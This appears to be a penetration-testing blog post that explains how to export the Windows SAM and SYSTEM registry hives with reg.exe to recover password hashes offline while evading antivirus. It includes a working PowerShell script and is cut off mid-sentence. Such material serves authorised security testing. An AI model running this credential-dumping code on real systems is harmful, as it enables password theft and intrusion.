September 2011

Remote Windows SAM Retrieval with VBScript

There's no denying that PSExec and FGDump are useful tools on an infrastructure penetration test. FGDump has a problem, however: it needs to inject into a running process (lsass.exe, the Local Security Authority) to read the hashes, and that behaviour is often blocked, or at least flagged, by antivirus. Whilst you can disable AV, this isn't advisable on a production server, especially if a safer alternative is available. Since XP, Windows has shipped with a built-in way (reg.exe) to export both the SAM and SYSTEM hives from a running machine, without injecting into any running process. You need both: the SAM hive holds the hashes, and the SYSTEM hive holds the boot key needed to decrypt them offline.
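As an added illustration (this is not the script from the original post, and it does not use VBScript), the same hive export done from an elevated PowerShell session on the target. The output directory and file names are my own choices; reg.exe save itself is the documented built-in command.

```powershell
# Added example, not the original post's code.
# Assumes an elevated (administrator) PowerShell session on the target host.
# $OutDir is an assumed location; pick somewhere you can clean up afterwards.
$OutDir = Join-Path $env:TEMP 'hives'
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# reg.exe save calls RegSaveKey, which needs an administrative token
# (reg.exe enables SeBackupPrivilege for you). Check first rather than
# discovering it via "Access is denied" half way through.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated prompt: HKLM\SAM is not readable otherwise.'
}

# Export both hives; SYSTEM is required to derive the boot key that
# protects the hashes stored in SAM.
foreach ($hive in 'SAM', 'SYSTEM') {
    $dest = Join-Path $OutDir "$hive.save"
    # /y overwrites an existing output file without prompting
    & reg.exe save "HKLM\$hive" $dest /y | Out-Null
    if ($LASTEXITCODE -ne 0 -or -not (Test-Path $dest)) {
        throw "reg save of HKLM\$hive failed (exit code $LASTEXITCODE)"
    }
}

Get-ChildItem $OutDir
```

The resulting .save files are raw registry hives: copy them off the host, parse them with an offline SAM/SYSTEM hive tool, and then delete them from the target, since leaving a readable copy of the SAM lying in a temp directory is a worse outcome than the AV alert you were trying to avoid.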

The commands are simple: